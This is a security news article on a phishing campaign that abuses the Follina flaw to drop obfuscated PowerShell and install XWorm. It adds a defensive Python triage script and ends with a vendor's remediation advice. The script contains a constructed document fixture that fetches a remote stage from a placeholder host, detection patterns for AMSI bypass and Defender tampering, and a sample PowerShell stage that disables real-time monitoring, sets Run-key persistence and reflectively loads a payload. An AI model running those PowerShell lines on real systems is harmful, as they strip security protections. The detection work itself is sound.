
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware to targeted systems.
Securonix, which tracks the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing companies and health clinics located in Germany.
“The attack campaign has been leveraging some rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims,” security researchers Den Iuzvyk, Tim Peck and Oleg Kolesnikov said in a new analysis shared with The Hacker News.
The report builds on recent findings by Elastic Security Labs, which described the threat actor's themed decoy documents used to trick victims into opening malicious files capable of delivering XWorm and Agent Tesla payloads.

The attacks begin with phishing emails that distribute deceptive Microsoft Word documents. Instead of relying on macros, the documents weaponize the Follina vulnerability (CVE-2022-30190, CVSS score: 7.8), a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT) that an Office document can reach through the ms-msdt: URL protocol handler, to drop an obfuscated PowerShell script.
From there, the PowerShell script is used to bypass the Antimalware Scan Interface (AMSI), disable Microsoft Defender, establish persistence, and finally load the .NET binary containing XWorm.
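As an added example (not code from Securonix, Elastic or this article), the following Python triage helpers check for the two stages just described: a .docx whose relationships pull a remote OLE object or template over HTTP, which is the shape a Follina document takes instead of a macro, and a dropped PowerShell script that tampers with AMSI and Defender, sets persistence and reflectively loads a .NET payload. The sample document, the example.invalid hostname and the PowerShell snippet are constructed for the demonstration; the indicator patterns are generic behaviours, not the campaign's actual indicators of compromise.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the relationship types a Follina-style document
# abuses: an external oleObject (or attachedTemplate) whose Target is a remote URL
# rather than a part inside the zip container.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_LOADING_TYPES = {OFFICE_REL + "oleObject", OFFICE_REL + "attachedTemplate"}


def external_relationships(docx_bytes: bytes) -> list[tuple[str, str]]:
    """Return (type, target) for every TargetMode="External" relationship in a .docx.

    Benign documents almost always reference internal parts only (styles,
    settings, media), so any external target deserves a look on its own.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    found.append((rel.get("Type", ""), rel.get("Target", "")))
    return found


def follina_suspects(docx_bytes: bytes) -> list[str]:
    """Targets of external OLE/template relationships that are fetched over http(s)."""
    return [
        target
        for rel_type, target in external_relationships(docx_bytes)
        if rel_type in REMOTE_LOADING_TYPES and re.match(r"(?i)https?://", target)
    ]


def html_invokes_msdt(html: str) -> bool:
    """True if the fetched HTML hands control to the ms-msdt: protocol handler."""
    return re.search(r"ms-msdt:", html, re.I) is not None


# Indicator patterns for the dropped PowerShell stage, grouped by behaviour.
PS_INDICATORS = {
    "amsi_bypass": [r"AmsiUtils", r"amsiInitFailed", r"AmsiScanBuffer"],
    "defender_tamper": [r"Set-MpPreference\s+-Disable\w+", r"Add-MpPreference\s+-Exclusion\w+", r"DisableAntiSpyware"],
    "persistence": [r"CurrentVersion\\Run", r"schtasks(\.exe)?\s+/create", r"Register-ScheduledTask", r"\\Startup\\"],
    "dotnet_loader": [r"\[(System\.)?Reflection\.Assembly\]::Load\(", r"FromBase64String\(", r"\bIEX\b|Invoke-Expression"],
}


def triage_powershell(script: str) -> dict[str, list[str]]:
    """Map each behaviour category to the patterns that matched (empty dict = nothing flagged)."""
    hits = {}
    for category, patterns in PS_INDICATORS.items():
        matched = [p for p in patterns if re.search(p, script, re.I)]
        if matched:
            hits[category] = matched
    return hits


def build_docx(document_rels: str) -> bytes:
    """Constructed minimal .docx: enough structure for the scanner, not a file Word would open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("word/document.xml", "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


BENIGN_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>
</Relationships>"""

# Constructed: the shape of a Follina document; example.invalid is a placeholder, not a real indicator.
FOLLINA_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OFFICE_REL}oleObject" Target="http://example.invalid/stage.html!" TargetMode="External"/>
</Relationships>"""

# Constructed: de-obfuscated shape of the dropped stage, not the campaign's actual script.
SAMPLE_PS = r"""
$CHOTAbheem = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$CHOTAbheem.GetField('amsiInitFailed', 'NonPublic,Static')
Set-MpPreference -DisableRealtimeMonitoring $true
Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name Updater -Value $loader
[Reflection.Assembly]::Load([Convert]::FromBase64String($blob)).EntryPoint.Invoke($null, $null)
"""

if __name__ == "__main__":
    print("benign docx  :", follina_suspects(build_docx(BENIGN_RELS)))
    print("follina docx :", follina_suspects(build_docx(FOLLINA_RELS)))
    print("powershell   :", triage_powershell(SAMPLE_PS))
```

The PowerShell patterns are meant to run against de-obfuscated text, since the article notes the real script is heavily obfuscated; in practice that means feeding them the script-block logging output (PowerShell Operational Event ID 4104, where the decoded block is recorded at execution time) rather than the on-disk dropper. The document check needs no Office installation because it only reads the zip container's relationship parts.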

Interestingly, one of the variables in the PowerShell script is called “$CHOTAbheem”, which is probably a reference to Chhota Bheem, an Indian animated comedy adventure television series.
“From a quick check, it appears that the individual or group responsible for the attack may have a Middle Eastern/Indian background, although final attribution has yet to be confirmed,” the researchers told The Hacker News, noting that such keywords can also be used as a cover.
XWorm is commodity malware that is advertised for sale on underground forums and comes with a wide range of features that allow it to siphon sensitive information from infected hosts.
The malware also functions as a Swiss Army knife: it can perform clipper, DDoS and ransomware operations, spread via USB, and launch additional malware.
The exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares artifacts with TA558, a group that has been observed targeting the hospitality industry in the past.
“While phishing emails rarely use Microsoft Office documents since Microsoft made the decision to disable macros by default, today we’re seeing proof that it’s still important to be on the lookout for malicious document files, especially in this case where there was no VBScript execution from macros,” the researchers said.
Ikaroa, a full stack tech company, cautions organizations about the XWorm campaign described above. It does not rely on a newly discovered flaw: Follina (CVE-2022-30190) was disclosed in May 2022 and fixed by Microsoft in June 2022, and the campaign succeeds on systems that never received that fix. Organizations should take all reasonable measures to protect themselves.
XWorm does not need to breach a system from the outside to take effect. The campaign delivers it by phishing: a victim who opens the crafted document on an unpatched machine triggers the chain, so no inbound firewall rule is ever crossed, and the dropped PowerShell stage then bypasses AMSI and disables Microsoft Defender before the payload runs.
Follina is not a product or platform; it is the nickname for CVE-2022-30190, a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT). A crafted Office document references a remote HTML file, which in turn invokes the ms-msdt: protocol handler to execute code, with no macro required. Any Windows host running Microsoft Office that lacks the June 2022 fix is at risk, which allows the malware to deliver payloads and install programs that access system data and other sensitive information.
Organizations running Microsoft Office on Windows should confirm that the June 2022 (or later) Windows security updates addressing CVE-2022-30190 are installed. Where patching is delayed, Microsoft's published workaround is to disable the MSDT URL protocol by backing up and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key. Layered defenses such as firewalls, antivirus and anti-malware with tamper protection enabled (so that a script cannot simply switch real-time monitoring off), and intrusion prevention systems remain important, as does keeping all systems patched and up to date.
Organizations should also use robust user authentication and access control, such as multi-factor authentication and least-privilege accounts (the PowerShell stage runs with the privileges of the user who opened the document), and have appropriate controls in place, such as attack surface reduction rules that block Office applications from creating child processes, to prevent malicious code from being installed on their systems.
At Ikaroa, our team of experienced security professionals is available to provide companies with technical assistance in warding off this wave of attacks. We urge organizations to contact us for help in defending against XWorm and other malicious code and in securing their operations.